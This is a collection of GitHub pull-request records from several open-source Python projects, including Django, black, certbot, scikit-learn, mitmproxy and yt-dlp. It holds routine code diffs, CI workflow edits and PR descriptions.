name='AggregateTestModel',
fields=[
diff --git a/tests/postgres_tests/models.py b/tests/postgres_tests/models.py
index 8528c59da1c06..e803c989e07a0 100644
--- a/tests/postgres_tests/models.py
+++ b/tests/postgres_tests/models.py
@@ -139,6 +139,11 @@ def __str__(self):
return self.dialogue or ''
+class LineSavedSearch(PostgreSQLModel):
+ line = models.ForeignKey('Line', models.CASCADE)
+ query = models.CharField(max_length=100)
+
+
class RangesModel(PostgreSQLModel):
ints = IntegerRangeField(blank=True, null=True)
bigints = BigIntegerRangeField(blank=True, null=True)
diff --git a/tests/postgres_tests/test_search.py b/tests/postgres_tests/test_search.py
index 0e836e896b726..b40d6729201d8 100644
--- a/tests/postgres_tests/test_search.py
+++ b/tests/postgres_tests/test_search.py
@@ -10,7 +10,7 @@
from django.test import modify_settings, skipUnlessDBFeature
from . import PostgreSQLSimpleTestCase, PostgreSQLTestCase
-from .models import Character, Line, Scene
+from .models import Character, Line, LineSavedSearch, Scene
try:
from django.contrib.postgres.search import (
@@ -110,6 +110,18 @@ def test_search_query_config(self):
)
self.assertSequenceEqual(searched, [self.verse2])
+ def test_search_with_F_expression(self):
+ # Non-matching query.
+ LineSavedSearch.objects.create(line=self.verse1, query='hearts')
+ # Matching query.
+ match = LineSavedSearch.objects.create(line=self.verse1, query='elbows')
+ for query_expression in [F('query'), SearchQuery(F('query'))]:
+ with self.subTest(query_expression):
+ searched = LineSavedSearch.objects.filter(
+ line__dialogue__search=query_expression,
+ )
+ self.assertSequenceEqual(searched, [match])
+
@modify_settings(INSTALLED_APPS={'append': 'django.contrib.postgres'})
class SearchVectorFieldTest(GrailTestData, PostgreSQLTestCase):
| ticket-31340 | https://api.github.com/repos/django/django/pulls/12525 | 2020-03-04T13:36:58Z | 2020-03-16T11:27:27Z | 2020-03-16T11:27:27Z | 2020-03-16T11:27:27Z | 1,391 | django/django | 51,149 |
Fixed #32296 -- Added --skip-checks option to runserver command. | diff --git a/django/core/management/commands/runserver.py b/django/core/management/commands/runserver.py
index d9fb0883500ac..1e8f4d3b25577 100644
--- a/django/core/management/commands/runserver.py
+++ b/django/core/management/commands/runserver.py
@@ -51,6 +51,10 @@ def add_arguments(self, parser):
'--noreload', action='store_false', dest='use_reloader',
help='Tells Django to NOT use the auto-reloader.',
)
+ parser.add_argument(
+ '--skip-checks', action='store_true',
+ help='Skip system checks.',
+ )
def execute(self, *args, **options):
if options['no_color']:
@@ -114,8 +118,9 @@ def inner_run(self, *args, **options):
shutdown_message = options.get('shutdown_message', '')
quit_command = 'CTRL-BREAK' if sys.platform == 'win32' else 'CONTROL-C'
- self.stdout.write("Performing system checks...\n\n")
- self.check(display_num_errors=True)
+ if not options['skip_checks']:
+ self.stdout.write('Performing system checks...\n\n')
+ self.check(display_num_errors=True)
# Need to check migrations here, so can't use the
# requires_migrations_check attribute.
self.check_migrations()
diff --git a/docs/ref/django-admin.txt b/docs/ref/django-admin.txt
index b7f6e175be84b..2dcd8604003af 100644
--- a/docs/ref/django-admin.txt
+++ b/docs/ref/django-admin.txt
@@ -968,7 +968,8 @@ more robust change detection, and a reduction in power usage. Django supports
When you start the server, and each time you change Python code while the
server is running, the system check framework will check your entire Django
project for some common errors (see the :djadmin:`check` command). If any
-errors are found, they will be printed to standard output.
+errors are found, they will be printed to standard output. You can use the
+``--skip-checks`` option to skip running system checks.
You can run as many concurrent servers as you want, as long as they're on
separate ports by executing ``django-admin runserver`` more than once.
@@ -1006,6 +1007,10 @@ multithreaded by default.
Uses IPv6 for the development server. This changes the default IP address from
``127.0.0.1`` to ``::1``.
+.. versionchanged:: 4.0
+
+ Support for the ``--skip-checks`` option was added.
+
Examples of using different ports and addresses
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
diff --git a/docs/releases/4.0.txt b/docs/releases/4.0.txt
index 52531c1266658..ed991fb67293e 100644
--- a/docs/releases/4.0.txt
+++ b/docs/releases/4.0.txt
@@ -153,7 +153,8 @@ Logging
Management Commands
~~~~~~~~~~~~~~~~~~~
-* ...
+* The :djadmin:`runserver` management command now supports the
+ :option:`--skip-checks` option.
Migrations
~~~~~~~~~~
diff --git a/tests/admin_scripts/tests.py b/tests/admin_scripts/tests.py
index d9ec07a3e34c4..fd94d4919f763 100644
--- a/tests/admin_scripts/tests.py
+++ b/tests/admin_scripts/tests.py
@@ -1313,6 +1313,29 @@ def test_readonly_database(self):
# You have # ...
self.assertIn('unapplied migration(s)', self.output.getvalue())
+ @mock.patch('django.core.management.commands.runserver.run')
+ @mock.patch('django.core.management.base.BaseCommand.check_migrations')
+ @mock.patch('django.core.management.base.BaseCommand.check')
+ def test_skip_checks(self, mocked_check, *mocked_objects):
+ call_command(
+ 'runserver',
+ use_reloader=False,
+ skip_checks=True,
+ stdout=self.output,
+ )
+ self.assertNotIn('Performing system checks...', self.output.getvalue())
+ mocked_check.assert_not_called()
+
+ self.output.truncate(0)
+ call_command(
+ 'runserver',
+ use_reloader=False,
+ skip_checks=False,
+ stdout=self.output,
+ )
+ self.assertIn('Performing system checks...', self.output.getvalue())
+ mocked_check.assert_called()
+
class ManageRunserverMigrationWarning(TestCase):
diff --git a/tests/utils_tests/test_autoreload.py b/tests/utils_tests/test_autoreload.py
index a43d7c2fded23..64bbcda27a1f5 100644
--- a/tests/utils_tests/test_autoreload.py
+++ b/tests/utils_tests/test_autoreload.py
@@ -98,8 +98,11 @@ def test_check_errors_catches_all_exceptions(self):
filename = self.temporary_file('test_exception.py')
filename.write_text('raise Exception')
with extend_sys_path(str(filename.parent)):
- with self.assertRaises(Exception):
- autoreload.check_errors(import_module)('test_exception')
+ try:
+ with self.assertRaises(Exception):
+ autoreload.check_errors(import_module)('test_exception')
+ finally:
+ autoreload._exception = None
self.assertFileFound(filename)
def test_zip_reload(self):
| https://code.djangoproject.com/ticket/32296 | https://api.github.com/repos/django/django/pulls/13809 | 2020-12-24T15:31:35Z | 2021-01-18T19:08:04Z | 2021-01-18T19:08:04Z | 2021-01-18T19:08:04Z | 1,206 | django/django | 50,925 |
Added a Solution using Euclidean Algo | diff --git a/Project Euler/Problem 05/sol2.py b/Project Euler/Problem 05/sol2.py
new file mode 100644
index 000000000000..cd11437f30db
--- /dev/null
+++ b/Project Euler/Problem 05/sol2.py
@@ -0,0 +1,20 @@
+#!/bin/python3
+'''
+Problem:
+2520 is the smallest number that can be divided by each of the numbers from 1 to 10 without any remainder.
+What is the smallest positive number that is evenly divisible(divisible with no remainder) by all of the numbers from 1 to N?
+'''
+
+""" Euclidean GCD Algorithm """
+def gcd(x,y):
+ return x if y==0 else gcd(y,x%y)
+
+""" Using the property lcm*gcd of two numbers = product of them """
+def lcm(x,y):
+ return (x*y)//gcd(x,y)
+
+n = int(input())
+g=1
+for i in range(1,n+1):
+ g=lcm(g,i)
+print(g)
diff --git a/Project Euler/Problem 9/sol2.py b/Project Euler/Problem 9/sol2.py
new file mode 100644
index 000000000000..13674d25875e
--- /dev/null
+++ b/Project Euler/Problem 9/sol2.py
@@ -0,0 +1,19 @@
+"""A Pythagorean triplet is a set of three natural numbers, for which,
+a^2+b^2=c^2
+Given N, Check if there exists any Pythagorean triplet for which a+b+c=N
+Find maximum possible value of product of a,b,c among all such Pythagorean triplets, If there is no such Pythagorean triplet print -1."""
+#!/bin/python3
+import sys
+
+product=-1
+d=0
+N = int(input())
+for a in range(1,N//3):
+ """Solving the two equations a**2+b**2=c**2 and a+b+c=N eliminating c """
+ b=(N*N-2*a*N)//(2*N-2*a)
+ c=N-a-b
+ if c*c==(a*a+b*b):
+ d=(a*b*c)
+ if d>=product:
+ product=d
+print(product)
| https://api.github.com/repos/TheAlgorithms/Python/pulls/277 | 2018-03-22T14:00:59Z | 2018-03-23T12:54:10Z | 2018-03-23T12:54:10Z | 2018-04-15T13:46:46Z | 524 | TheAlgorithms/Python | 29,784 |
|
Print out line diff on test failure | diff --git a/tests/util.py b/tests/util.py
index 84e98bb0fbd..8755111f7c5 100644
--- a/tests/util.py
+++ b/tests/util.py
@@ -9,7 +9,7 @@
import black
from black.debug import DebugVisitor
from black.mode import TargetVersion
-from black.output import err, out
+from black.output import diff, err, out
THIS_DIR = Path(__file__).parent
DATA_DIR = THIS_DIR / "data"
@@ -47,6 +47,9 @@ def _assert_format_equal(expected: str, actual: str) -> None:
except Exception as ve:
err(str(ve))
+ if actual != expected:
+ out(diff(expected, actual, "expected", "actual"))
+
assert actual == expected
| ### Description
It currently prints both ASTs - this also
adds the line diff, making it much easier to visualize
the changes as well. Not too verbose since it's only a diff.
Especially useful if the test file is long (and the ASTs are big)
### Checklist - did you ...
- [x ] Add a CHANGELOG entry if necessary? (should not be necessary for this)
- [x ] Add / update tests if necessary?
- [x ] Add new / update outdated documentation? | https://api.github.com/repos/psf/black/pulls/2552 | 2021-10-21T05:23:21Z | 2021-10-27T14:37:20Z | 2021-10-27T14:37:20Z | 2021-10-27T17:47:03Z | 178 | psf/black | 24,582 |
Add Tenor to sites list | diff --git a/sherlock/resources/data.json b/sherlock/resources/data.json
index 03a5405ab..2df5d15e7 100644
--- a/sherlock/resources/data.json
+++ b/sherlock/resources/data.json
@@ -1443,6 +1443,14 @@
"username_claimed": "blue",
"username_unclaimed": "noonewouldeverusethis7"
},
+ "Tenor": {
+ "errorType": "status_code",
+ "regexCheck": "^[A-Za-z0-9_]{2,32}$",
+ "url": "https://tenor.com/users/{}",
+ "urlMain": "https://tenor.com/",
+ "username_claimed": "red",
+ "username_unclaimed": "impossible-username"
+ },
"TikTok": {
"errorType": "status_code",
"url": "https://tiktok.com/@{}",
diff --git a/sites.md b/sites.md
index 756bc7172..dbd9d87f2 100644
--- a/sites.md
+++ b/sites.md
@@ -1,4 +1,4 @@
-## List Of Supported Sites (284 Sites In Total!)
+## List Of Supported Sites (285 Sites In Total!)
1. [2Dimensions](https://2Dimensions.com/)
1. [3dnews](http://forum.3dnews.ru/)
1. [7Cups](https://www.7cups.com/)
@@ -188,6 +188,7 @@
1. [TETR.IO](https://tetr.io)
1. [Telegram](https://t.me/)
1. [Tellonym.me](https://tellonym.me/)
+1. [Tenor](https://tenor.com/)
1. [TikTok](https://tiktok.com/)
1. [Tinder](https://tinder.com/)
1. [TrackmaniaLadder](http://en.tm-ladder.com/index.php)
| Adds support for [Tenor](https://tenor.com/). | https://api.github.com/repos/sherlock-project/sherlock/pulls/1137 | 2021-09-19T17:19:49Z | 2021-10-27T18:28:08Z | 2021-10-27T18:28:08Z | 2021-10-27T18:47:15Z | 445 | sherlock-project/sherlock | 36,604 |
Make coveralls dependent on the TOXENV variable being "cover" | diff --git a/.travis.yml b/.travis.yml
index d790e94f9e8..b39d603ee44 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -10,7 +10,7 @@ install:
script: travis_retry tox
-after_success: coveralls
+after_success: '[ "$TOXENV" == "cover" ] && coveralls'
env:
- TOXENV=py26
| This one-liner stops `coveralls` from running except when the env variable is set to 'cover'. This should resolve issue #253 .
The travis build works, and all the sub-builds are 0.00s (meaning they skipped):
https://travis-ci.org/letsencrypt/lets-encrypt-preview/builds/52059686
| https://api.github.com/repos/certbot/certbot/pulls/264 | 2015-02-24T23:07:28Z | 2015-02-25T00:10:13Z | 2015-02-25T00:10:13Z | 2016-05-06T19:21:59Z | 106 | certbot/certbot | 2,039 |
When permissions don't work (maybe you're root), disable a unit test that assumes permissions work | diff --git a/letsencrypt/plugins/webroot_test.py b/letsencrypt/plugins/webroot_test.py
index 9f5b6bba8ef..defe9396bea 100644
--- a/letsencrypt/plugins/webroot_test.py
+++ b/letsencrypt/plugins/webroot_test.py
@@ -66,8 +66,16 @@ def test_prepare_full_root_exists(self):
def test_prepare_reraises_other_errors(self):
self.auth.full_path = os.path.join(self.path, "null")
+ permission_canary = os.path.join(self.path, "rnd")
+ with open(permission_canary, "w") as f:
+ f.write("thingimy")
os.chmod(self.path, 0o000)
- self.assertRaises(errors.PluginError, self.auth.prepare)
+ try:
+ open(permission_canary, "r")
+ print "Warning, running tests as root skips permissions tests..."
+ except IOError:
+ # ok, permissions work, test away...
+ self.assertRaises(errors.PluginError, self.auth.prepare)
os.chmod(self.path, 0o700)
@mock.patch("letsencrypt.plugins.webroot.os.chown")
| Fixes: #1979
| https://api.github.com/repos/certbot/certbot/pulls/1980 | 2015-12-22T04:03:17Z | 2015-12-22T23:55:14Z | 2015-12-22T23:55:14Z | 2016-05-06T19:21:56Z | 257 | certbot/certbot | 1,172 |
Added OpenAssistant/oasst-rlhf-2-llama-30b-7k-steps | diff --git a/oasst-shared/oasst_shared/model_configs.py b/oasst-shared/oasst_shared/model_configs.py
index d676985e56..13b78e17bc 100644
--- a/oasst-shared/oasst_shared/model_configs.py
+++ b/oasst-shared/oasst_shared/model_configs.py
@@ -129,6 +129,11 @@ def compat_hash(self) -> str:
max_input_length=1024,
max_total_length=1792, # seeing OOMs on 2048 on an A100 80GB
),
+ "OA_RLHF_Llama_30B_2_7k": ModelConfig(
+ model_id="OpenAssistant/oasst-rlhf-2-llama-30b-7k-steps",
+ max_input_length=1024,
+ max_total_length=1792, # seeing OOMs on 2048 on an A100 80GB
+ ),
"Carper_RLHF_13B_1": ModelConfig(
model_id="CarperAI/vicuna-13b-fine-tuned-rlhf",
max_input_length=1024,
| https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/3063 | 2023-05-06T14:28:33Z | 2023-05-06T14:31:26Z | 2023-05-06T14:31:26Z | 2023-05-06T14:31:27Z | 260 | LAION-AI/Open-Assistant | 37,843 |
|
BUG: for several datasets, ``download_if_missing`` keyword was ignored. | diff --git a/sklearn/datasets/california_housing.py b/sklearn/datasets/california_housing.py
index c109fee6185d8..8a74ad9e60e35 100644
--- a/sklearn/datasets/california_housing.py
+++ b/sklearn/datasets/california_housing.py
@@ -87,8 +87,12 @@ def fetch_california_housing(data_home=None, download_if_missing=True):
data_home = get_data_home(data_home=data_home)
if not exists(data_home):
makedirs(data_home)
+
filepath = _pkl_filepath(data_home, TARGET_FILENAME)
if not exists(filepath):
+ if not download_if_missing:
+ raise IOError("Data not found and `download_if_missing` is False")
+
print('downloading Cal. housing from %s to %s' % (DATA_URL, data_home))
archive_fileobj = BytesIO(urlopen(DATA_URL).read())
fileobj = tarfile.open(
diff --git a/sklearn/datasets/covtype.py b/sklearn/datasets/covtype.py
index f7cb1ed03f36b..6e0b4d2d0d21c 100644
--- a/sklearn/datasets/covtype.py
+++ b/sklearn/datasets/covtype.py
@@ -99,6 +99,9 @@ def fetch_covtype(data_home=None, download_if_missing=True,
joblib.dump(X, samples_path, compress=9)
joblib.dump(y, targets_path, compress=9)
+ elif not available:
+ if not download_if_missing:
+ raise IOError("Data not found and `download_if_missing` is False")
try:
X, y
diff --git a/sklearn/datasets/kddcup99.py b/sklearn/datasets/kddcup99.py
index 824809a80edd6..03bf3f8d8fdef 100644
--- a/sklearn/datasets/kddcup99.py
+++ b/sklearn/datasets/kddcup99.py
@@ -345,6 +345,9 @@ def _fetch_brute_kddcup99(subset=None, data_home=None,
joblib.dump(X, samples_path, compress=0)
joblib.dump(y, targets_path, compress=0)
+ elif not available:
+ if not download_if_missing:
+ raise IOError("Data not found and `download_if_missing` is False")
try:
X, y
diff --git a/sklearn/datasets/olivetti_faces.py b/sklearn/datasets/olivetti_faces.py
index e74d65d60e18d..5f3af040dc1a4 100644
--- a/sklearn/datasets/olivetti_faces.py
+++ b/sklearn/datasets/olivetti_faces.py
@@ -111,6 +111,9 @@ def fetch_olivetti_faces(data_home=None, shuffle=False, random_state=0,
makedirs(data_home)
filepath = _pkl_filepath(data_home, TARGET_FILENAME)
if not exists(filepath):
+ if not download_if_missing:
+ raise IOError("Data not found and `download_if_missing` is False")
+
print('downloading Olivetti faces from %s to %s'
% (DATA_URL, data_home))
fhandle = urlopen(DATA_URL)
@@ -121,6 +124,7 @@ def fetch_olivetti_faces(data_home=None, shuffle=False, random_state=0,
del mfile
else:
faces = joblib.load(filepath)
+
# We want floating point data, but float32 is enough (there is only
# one byte of precision in the original uint8s anyway)
faces = np.float32(faces)
diff --git a/sklearn/datasets/species_distributions.py b/sklearn/datasets/species_distributions.py
index 6af36e6745d33..330c535620b7d 100644
--- a/sklearn/datasets/species_distributions.py
+++ b/sklearn/datasets/species_distributions.py
@@ -222,6 +222,9 @@ def fetch_species_distributions(data_home=None,
archive_path = _pkl_filepath(data_home, DATA_ARCHIVE_NAME)
if not exists(archive_path):
+ if not download_if_missing:
+ raise IOError("Data not found and `download_if_missing` is False")
+
print('Downloading species data from %s to %s' % (SAMPLES_URL,
data_home))
X = np.load(BytesIO(urlopen(SAMPLES_URL).read()))
diff --git a/sklearn/datasets/tests/test_covtype.py b/sklearn/datasets/tests/test_covtype.py
index f32511d7c9aa8..c980bb86fc870 100644
--- a/sklearn/datasets/tests/test_covtype.py
+++ b/sklearn/datasets/tests/test_covtype.py
@@ -3,7 +3,6 @@
Skipped if covtype is not already downloaded to data_home.
"""
-import errno
from sklearn.datasets import fetch_covtype
from sklearn.utils.testing import assert_equal, SkipTest
@@ -15,9 +14,8 @@ def fetch(*args, **kwargs):
def test_fetch():
try:
data1 = fetch(shuffle=True, random_state=42)
- except IOError as e:
- if e.errno == errno.ENOENT:
- raise SkipTest("Covertype dataset can not be loaded.")
+ except IOError:
+ raise SkipTest("Covertype dataset can not be loaded.")
data2 = fetch(shuffle=True, random_state=37)
diff --git a/sklearn/datasets/tests/test_kddcup99.py b/sklearn/datasets/tests/test_kddcup99.py
index 414c89763c1e8..498b98f4e67ed 100644
--- a/sklearn/datasets/tests/test_kddcup99.py
+++ b/sklearn/datasets/tests/test_kddcup99.py
@@ -5,7 +5,6 @@
scikit-learn data folder.
"""
-import errno
from sklearn.datasets import fetch_kddcup99
from sklearn.utils.testing import assert_equal, SkipTest
@@ -13,9 +12,8 @@
def test_percent10():
try:
data = fetch_kddcup99(download_if_missing=False)
- except IOError as e:
- if e.errno == errno.ENOENT:
- raise SkipTest("kddcup99 dataset can not be loaded.")
+ except IOError:
+ raise SkipTest("kddcup99 dataset can not be loaded.")
assert_equal(data.data.shape, (494021, 41))
assert_equal(data.target.shape, (494021,))
| Do what is promised in the docstring (raise an ``IOError``), if ``download_if_missing=False`` and the dataset wasn't previously downloaded. | https://api.github.com/repos/scikit-learn/scikit-learn/pulls/7944 | 2016-11-27T09:55:34Z | 2016-11-29T17:43:32Z | 2016-11-29T17:43:32Z | 2016-11-29T19:06:37Z | 1,477 | scikit-learn/scikit-learn | 46,274 |
bugfix: unittest secret | diff --git a/.github/workflows/unittest.yaml b/.github/workflows/unittest.yaml
index a8eb657ab..6b8edee81 100644
--- a/.github/workflows/unittest.yaml
+++ b/.github/workflows/unittest.yaml
@@ -2,11 +2,7 @@ name: Python application test
on:
workflow_dispatch:
- pull_request:
- branches:
- - 'main'
- - 'dev'
- - '*-release'
+ pull_request_target:
push:
branches:
- 'main'
@@ -56,5 +52,3 @@ jobs:
./tests/data/rsp_cache_new.json
retention-days: 3
if: ${{ always() }}
-
-
\ No newline at end of file
| support pr unittest secret | https://api.github.com/repos/geekan/MetaGPT/pulls/698 | 2024-01-05T14:55:40Z | 2024-01-06T10:40:46Z | 2024-01-06T10:40:46Z | 2024-01-06T10:40:46Z | 175 | geekan/MetaGPT | 16,952 |
[workflow] updated release bdist workflow | diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 07452f4f398d..fa00a6a72c7c 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -14,7 +14,7 @@ jobs:
contains( github.event.pull_request.labels.*.name, 'Run Build and Test')
runs-on: [self-hosted, gpu]
container:
- image: hpcaitech/pytorch-cuda:1.10.1-11.3.0
+ image: hpcaitech/pytorch-cuda:1.12.0-11.3.0
options: --gpus all --rm -v /data/scratch/cifar-10:/data/scratch/cifar-10
timeout-minutes: 40
steps:
diff --git a/.github/workflows/release_bdist.yml b/.github/workflows/release_bdist.yml
index 2e5233d0a29c..7d5f9e731743 100644
--- a/.github/workflows/release_bdist.yml
+++ b/.github/workflows/release_bdist.yml
@@ -3,16 +3,15 @@ name: Release bdist wheel
on:
workflow_dispatch:
inputs:
+ torch_version:
+ type: string
+ description: torch version, separated by comma
+ required: true
+ default: "all"
cuda_version:
- type: choice
- description: CUDA Version
- default: 'all'
+ type: string
+ description: cuda version, separated by comma
required: true
- options:
- - all
- - "11.3"
- - "11.1"
- - "10.2"
github_ref:
type: string
description: Branch or Tag
@@ -27,12 +26,24 @@ jobs:
matrix: ${{ steps.set-matrix.outputs.matrix }}
steps:
- id: set-matrix
+ env:
+ TORCH_VERSIONS: ${{ inputs.torch_version }}
+ CUDA_VERSIONS: ${{ inputs.cuda_version }}
run: |
- [ "${{github.event.inputs.cuda_version}}" != "" ] && matrix="[\"hpcaitech/cuda-conda:${{github.event.inputs.cuda_version}}\"]"
- [ "${{github.event.inputs.cuda_version}}" == "" ] || [ "${{github.event.inputs.cuda_version}}" == "all" ] && \
- matrix="[\"hpcaitech/cuda-conda:11.3\", \"hpcaitech/cuda-conda:11.1\", \"hpcaitech/cuda-conda:10.2\"]"
- echo $matrix
- echo "::set-output name=matrix::{\"container\":$(echo $matrix)}"
+ echo $TORCH_VERSIONS
+ echo $CUDA_VERSIONS
+ IFS=','
+ DOCKER_IMAGE=()
+
+ for cv in $CUDA_VERSIONS
+ do
+ DOCKER_IMAGE+=("\"hpcaitech/cuda-conda:${cv}\"")
+ done
+
+ container=$( IFS=',' ; echo "${DOCKER_IMAGE[*]}" )
+ container="[${container}]"
+ echo "$container"
+ echo "::set-output name=matrix::{\"container\":$(echo "$container")}"
build:
name: Release bdist wheels
@@ -62,7 +73,9 @@ jobs:
- name: Build bdist wheel
run: |
pip install beautifulsoup4 requests packaging
- python ./build_colossalai_wheel.py
+ python ./build_colossalai_wheel.py --torch_version $TORCH_VERSIONS
+ env:
+ TORCH_VERSIONS: ${{ inputs.torch_version }}
- name: 🚀 Deploy
uses: garygrossgarten/github-action-scp@release
with:
diff --git a/.github/workflows/scripts/build_colossalai_wheel.py b/.github/workflows/scripts/build_colossalai_wheel.py
index dcedca73790c..2d33238e25de 100644
--- a/.github/workflows/scripts/build_colossalai_wheel.py
+++ b/.github/workflows/scripts/build_colossalai_wheel.py
@@ -15,6 +15,7 @@
def parse_args():
parser = argparse.ArgumentParser()
+ parser.add_argument('--torch_version', type=str)
parser.add_argument('--nightly', action='store_true',
help='whether this build is for nightly release, if True, will only build on the latest PyTorch version and Python 3.8')
return parser.parse_args()
@@ -81,29 +82,27 @@ def main():
args = parse_args()
wheel_info = all_wheel_info()
- if args.nightly:
- latest_torch_version = list(wheel_info.keys())
+ # filter wheels on condition
+ all_torch_versions = list(wheel_info.keys())
+ def _compare_version(a, b):
+ if version.parse(a) > version.parse(b):
+ return 1
+ else:
+ return -1
- def _compare_version(a, b):
- if version.parse(a) > version.parse(b):
- return 1
- else:
- return -1
+ all_torch_versions.sort(key=cmp_to_key(_compare_version))
- latest_torch_version.sort(key=cmp_to_key(_compare_version))
-
+ if args.nightly:
# only keep the latest version
- for key in latest_torch_version[:-1]:
+ for key in all_torch_versions[:-1]:
wheel_info.pop(key)
-
- # we only keep python 3.8 for nightly release
- for torch_version, cuda_versioned_info in wheel_info.items():
- for cuda_version, python_versioned_info in cuda_versioned_info.items():
- python_versions = list(python_versioned_info.keys())
-
- for key in python_versions:
- if key != '3.8':
- python_versioned_info.pop(key)
+ elif args.torch_version != 'all':
+ torch_versions = args.torch_version.split(',')
+ # only keep the torch versions specified
+ for key in all_torch_versions:
+ if key not in torch_versions:
+ wheel_info.pop(key)
+
build_colossalai(wheel_info)
if __name__ == '__main__':
| Updated the binary distribution release workflow to support arbitrary inputs. Meanwhile, the defautl build workflow will use the latest pytorch version. | https://api.github.com/repos/hpcaitech/ColossalAI/pulls/1318 | 2022-07-14T16:39:01Z | 2022-07-15T01:40:58Z | 2022-07-15T01:40:58Z | 2022-09-09T15:04:08Z | 1,407 | hpcaitech/ColossalAI | 11,641 |
Post-Release Cleanups | diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml
index 454acff30a..a8260fd087 100644
--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -178,7 +178,11 @@ jobs:
# Separate from everything else because slow.
build-and-deploy-docker:
- if: github.repository == 'mitmproxy/mitmproxy' && (github.ref == 'refs/heads/main' || github.ref == 'refs/heads/dockertest')
+ if: github.repository == 'mitmproxy/mitmproxy' && (
+ github.ref == 'refs/heads/main' ||
+ github.ref == 'refs/heads/dockertest' ||
+ startsWith(github.ref, 'refs/tags/')
+ )
environment: deploy-docker
needs:
- test
diff --git a/release/README.md b/release/README.md
index 1f1644550a..fbb6820d6c 100644
--- a/release/README.md
+++ b/release/README.md
@@ -40,9 +40,9 @@ These steps assume you are on the correct branch and have a git remote called `o
### Docs
-- `./build.sh`. If everything looks alright, continue with
+- `./build.py`. If everything looks alright, continue with
- `./upload-stable.sh`,
-- `DOCS_ARCHIVE=true ./build.sh`, and
+- `DOCS_ARCHIVE=true ./build.py`, and
- `./upload-archive.sh v4`. Doing this now already saves you from switching back to an old state on the next release.
### Website
diff --git a/release/cibuild.py b/release/cibuild.py
index 0bbfdff26c..0ad958dbfa 100755
--- a/release/cibuild.py
+++ b/release/cibuild.py
@@ -541,8 +541,14 @@ def upload(): # pragma: no cover
], cwd=docker_build_dir)
if be.is_prod_release:
- subprocess.check_call(["docker", "tag", be.docker_tag, "mitmproxy/mitmproxy:latest"])
- subprocess.check_call(["docker", "push", "mitmproxy/mitmproxy:latest"])
+ subprocess.check_call([
+ "docker", "buildx", "build",
+ "--tag", "mitmproxy/mitmproxy:latest",
+ "--push",
+ "--platform", DOCKER_PLATFORMS,
+ "--build-arg", f"MITMPROXY_WHEEL={whl.name}",
+ "."
+ ], cwd=docker_build_dir)
if __name__ == "__main__": # pragma: no cover
diff --git a/release/deploy.py b/release/deploy.py
index 6e60e3f5d3..9363109dd5 100755
--- a/release/deploy.py
+++ b/release/deploy.py
@@ -1,8 +1,10 @@
#!/usr/bin/env python3
import os
+import re
import subprocess
from pathlib import Path
from typing import Optional
+# Security: No third-party dependencies here!
if __name__ == "__main__":
ref = os.environ["GITHUB_REF"]
@@ -17,7 +19,8 @@
# Upload binaries (be it release or snapshot)
if tag:
- upload_dir = tag
+ # remove "v" prefix from version tags.
+ upload_dir = re.sub(r"^v([\d.]+)$", r"\1", tag)
else:
upload_dir = f"branches/{branch}"
subprocess.check_call([
| This PR fixes the issues described in #4685. | https://api.github.com/repos/mitmproxy/mitmproxy/pulls/4690 | 2021-07-19T09:20:28Z | 2021-07-19T11:20:09Z | 2021-07-19T11:20:08Z | 2021-07-19T11:20:11Z | 794 | mitmproxy/mitmproxy | 27,869 |
[SkyNewsAU] Add extractor | diff --git a/yt_dlp/extractor/extractors.py b/yt_dlp/extractor/extractors.py
index 6bc9a2b1eb7..77ded69263b 100644
--- a/yt_dlp/extractor/extractors.py
+++ b/yt_dlp/extractor/extractors.py
@@ -1281,6 +1281,7 @@
SkyNewsArabiaIE,
SkyNewsArabiaArticleIE,
)
+from .skynewsau import SkyNewsAUIE
from .sky import (
SkyNewsIE,
SkySportsIE,
diff --git a/yt_dlp/extractor/skynewsau.py b/yt_dlp/extractor/skynewsau.py
new file mode 100644
index 00000000000..b1d77951e77
--- /dev/null
+++ b/yt_dlp/extractor/skynewsau.py
@@ -0,0 +1,46 @@
+# coding: utf-8
+from __future__ import unicode_literals
+
+from .common import InfoExtractor
+from ..utils import (
+ try_get,
+ unified_strdate,
+)
+
+
+class SkyNewsAUIE(InfoExtractor):
+ _VALID_URL = r'(?:https?://)(?:www\.)?skynews\.com\.au/[^/]+/[^/]+/[^/]+/video/(?P<id>[a-z0-9]+)'
+
+ _TESTS = [{
+ 'url': 'https://www.skynews.com.au/world-news/united-states/incredible-vision-shows-lava-overflowing-from-spains-la-palma-volcano/video/0f4c6243d6903502c01251f228b91a71',
+ 'info_dict': {
+ 'id': '6277184925001',
+ 'ext': 'mp4',
+ 'title': 'md5:60594f1ea6d5ae93e292900f4d34e9ae',
+ 'description': 'md5:60594f1ea6d5ae93e292900f4d34e9ae',
+ 'thumbnail': r're:^https?://.*\.jpg',
+ 'duration': 76.394,
+ 'timestamp': 1634271300,
+ 'uploader_id': '5348771529001',
+ 'tags': ['fblink', 'msn', 'usa', 'world', 'yt'],
+ 'upload_date': '20211015',
+ },
+ 'params': {'skip_download': True, 'format': 'bv'}
+ }]
+
+ _API_KEY = '6krsj3w249nk779d8fukqx9f'
+
+ def _real_extract(self, url):
+ id = self._match_id(url)
+ webpage = self._download_webpage(url, id)
+ embedcode = self._search_regex(r'embedcode\s?=\s?\"([^\"]+)\"', webpage, 'embedcode')
+ data_json = self._download_json(
+ f'https://content.api.news/v3/videos/brightcove/{embedcode}?api_key={self._API_KEY}', id)['content']
+ return {
+ 'id': id,
+ '_type': 'url_transparent',
+ 'url': 'https://players.brightcove.net/%s/default_default/index.html?videoId=%s' % tuple(embedcode.split('-')),
+ 'ie_key': 'BrightcoveNew',
+ 'title': data_json.get('caption'),
+ 'upload_date': unified_strdate(try_get(data_json, lambda x: x['date']['created'])),
+ }
| ## Please follow the guide below
- You will be asked some questions, please read them **carefully** and answer honestly
- Put an `x` into all the boxes [ ] relevant to your *pull request* (like that [x])
- Use *Preview* tab to see how your *pull request* will actually look like
---
### Before submitting a *pull request* make sure you have:
- [ ] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions)
